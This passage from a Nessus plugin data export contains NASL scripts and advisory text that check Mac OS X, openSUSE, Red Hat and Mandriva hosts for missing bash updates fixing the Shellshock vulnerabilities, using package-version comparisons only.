script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\npatch = '2014-005';\n\n# Compare 2 patch numbers to determine if patch requirements are satisfied.\n# Return true if this patch or a later patch is 
applied\n# Return false otherwise\nfunction check_patch(year, number)\n{\n local_var p_split = split(patch, sep:'-');\n local_var p_year = int( p_split[0]);\n local_var p_num = int( p_split[1]);\n\n if (year > p_year) return TRUE;\n else if (year < p_year) return FALSE;\n else if (number >= p_num) return TRUE;\n else return FALSE;\n}\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\nif (!ereg(pattern:\"Mac OS X 10\\.[89]([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X 10.8 / 10.9\");\nelse if (\"Mac OS X 10.8\" >< os && !ereg(pattern:\"Mac OS X 10\\.8($|\\.[0-5]([^0-9]|$))\", string:os)) exit(0, \"The remote host uses a version of Mac OS X Mountain Lion later than 10.8.5.\");\nelse if (\"Mac OS X 10.9\" >< os && !ereg(pattern:\"Mac OS X 10\\.9($|\\.[0-5]([^0-9]|$))\", string:os)) exit(0, \"The remote host uses a version of Mac OS X Mavericks later than 10.9.5.\");\n\npackages = get_kb_item_or_exit(\"Host/MacOSX/packages/boms\", exit_code:1);\nsec_boms_report = egrep(pattern:\"^com\\.apple\\.pkg\\.update\\.security\\..*bom$\", string:packages);\nsec_boms = split(sec_boms_report, sep:'\\n');\n\nforeach package (sec_boms)\n{\n # Grab patch year and number\n match = eregmatch(pattern:\"[^0-9](20[0-9][0-9])[-.]([0-9]{3})[^0-9]\", string:package);\n if (empty_or_null(match[1]) || empty_or_null(match[2]))\n continue;\n\n patch_found = check_patch(year:int(match[1]), number:int(match[2]));\n if (patch_found) exit(0, \"The host has Security Update \" + patch + \" or later installed and is therefore not affected.\");\n}\n\nreport = '\\n Missing security update : ' + patch;\nreport += '\\n Installed security BOMs : ';\nif (sec_boms_report) report += str_replace(find:'\\n', replace:'\\n ', string:sec_boms_report);\nelse report += 'n/a';\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": 
{"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:58:13", "description": "- Replace patches bash-4.2-heredoc-eof-delim.patch and bash-4.2-parse-exportfunc.patch with the official upstream patch levels bash42-052 and bash42-053\n\n - Replace patch bash-4.2-CVE-2014-7187.patch with upstream patch level bash42-051\n\n - Make bash-4.2-extra-import-func.patch an optional patch due instruction\n\n - Remove and replace patches bash-4.2-CVE-2014-6271.patch bash-4.2-BSC898604.patch bash-4.2-CVE-2014-7169.patch with bash upstream patch 48, patch 49, and patch 50\n\n - Add patch bash-4.2-extra-import-func.patch which is based on the BSD patch of Christos. As further enhancements the option import-functions is mentioned in the manual page and a shopt switch is added to enable and disable import-functions on the fly", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-10-21T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bash (openSUSE-SU-2014:1308-1) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:12.3"], "id": "OPENSUSE-2014-594.NASL", "href": "https://www.tenable.com/plugins/nessus/78590", "sourceData": 
"#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-594.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78590);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\", \"CVE-2014-7187\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"openSUSE Security Update : bash (openSUSE-SU-2014:1308-1) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"- Replace patches bash-4.2-heredoc-eof-delim.patch and\n bash-4.2-parse-exportfunc.patch with the official\n upstream patch levels bash42-052 and bash42-053\n\n - Replace patch bash-4.2-CVE-2014-7187.patch with upstream\n patch level bash42-051\n\n - Make bash-4.2-extra-import-func.patch an optional patch\n due instruction\n\n - Remove and replace patches bash-4.2-CVE-2014-6271.patch\n bash-4.2-BSC898604.patch bash-4.2-CVE-2014-7169.patch\n with bash upstream patch 48, patch 49, and patch 50\n\n - Add patch bash-4.2-extra-import-func.patch which is\n based on the BSD patch of Christos. 
As further\n enhancements the option import-functions is mentioned in\n the manual page and a shopt switch is added to enable\n and disable import-functions on the fly\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=896776\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=898346\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2014-10/msg00023.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-debuginfo-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-debugsource-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-devel-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-lang-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-loadables-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-loadables-debuginfo-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreadline6-6.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreadline6-debuginfo-6.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"readline-devel-6.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"bash-debuginfo-32bit-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", 
reference:\"libreadline6-32bit-6.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.2-61.19.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo-32bit / bash-debuginfo / bash-debugsource / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:12:28", "description": "[Updated September 30, 2014] This advisory has been updated with information on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 4 Extended Life Cycle Support, Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. 
An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables need to be made aware of changes to the way names are handled by this update. Note that certain services, screen sessions, and tmux sessions may need to be restarted, and affected interactive users may need to re-login. Installing these updated packages without restarting services will address the vulnerability, but functionality may be impacted until affected services are restarted. For more information see the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their containers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-08T00:00:00", "type": "nessus", "title": "RHEL 4 / 5 / 6 : bash (RHSA-2014:1311)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:bash", "p-cpe:/a:redhat:enterprise_linux:bash-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bash-doc", "cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:5.9", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.2", "cpe:/o:redhat:enterprise_linux:6.4"], "id": "REDHAT-RHSA-2014-1311.NASL", "href": "https://www.tenable.com/plugins/nessus/79052", "sourceData": "#%NASL_MIN_LEVEL 
70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1311. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79052);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_bugtraq_id(70137, 70152, 70154);\n script_xref(name:\"RHSA\", value:\"2014:1311\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"RHEL 4 / 5 / 6 : bash (RHSA-2014:1311)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"[Updated September 30, 2014] This advisory has been updated with\ninformation on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 4 Extended Life Cycle Support, Red Hat\nEnterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended\nUpdate Support, Red Hat Enterprise Linux 6.2 Advanced Update Support,\nand Red Hat Enterprise Linux 6.4 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). 
Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment\nvariables need to be made aware of changes to the way names are\nhandled by this update. Note that certain services, screen sessions,\nand tmux sessions may need to be restarted, and affected interactive\nusers may need to re-login. Installing these updated packages without\nrestarting services will address the vulnerability, but functionality\nmay be impacted until affected services are restarted. 
For more\ninformation see the Knowledgebase article at\nhttps://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their\ncontainers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer\nto the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/articles/1200223\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:1311\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7186\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7187\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash, bash-debuginfo and / or bash-doc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(4|5\\.6|5\\.9|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.6 / 5.9 / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1311\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"bash-3.0-27.el4.4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"bash-3.0-27.el4.4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"bash-3.2-24.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"bash-3.2-32.el5_9.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"bash-3.2-32.el5_9.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"bash-3.2-24.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"bash-3.2-32.el5_9.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"bash-debuginfo-3.2-24.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"bash-debuginfo-3.2-32.el5_9.3\")) flag++;\n\n if 
(rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"bash-debuginfo-3.2-32.el5_9.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"bash-debuginfo-3.2-24.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"bash-debuginfo-3.2-32.el5_9.3\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"bash-4.1.2-15.el6_4.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"bash-4.1.2-15.el6_4.2\")) flag++;\n\nif (sp == \"2\") { if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"bash-4.1.2-9.el6_2.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-4.1.2-15.el6_4.2\")) flag++; }\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"bash-debuginfo-4.1.2-15.el6_4.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"bash-debuginfo-4.1.2-15.el6_4.2\")) flag++;\n\nif (sp == \"2\") { if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.1.2-9.el6_2.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.1.2-15.el6_4.2\")) flag++; }\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"bash-doc-4.1.2-15.el6_4.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"bash-doc-4.1.2-15.el6_4.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"bash-doc-4.1.2-15.el6_4.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"bash-doc-4.1.2-9.el6_2.2\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo / bash-doc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:59", "description": "It was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue (CVE-2014-7169, CVE-2014-7186, CVE-2014-7187).\n\nAdditionally bash has been updated from patch level 37 to 48 using the upstream patches at ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/ which resolves various bugs.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : bash (MDVSA-2014:190)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:bash", "p-cpe:/a:mandriva:linux:bash-doc", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2014-190.NASL", "href": "https://www.tenable.com/plugins/nessus/77950", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:190. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77950);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_bugtraq_id(70137);\n script_xref(name:\"MDVSA\", value:\"2014:190\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Mandriva Linux Security Advisory : bash (MDVSA-2014:190)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"It was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. 
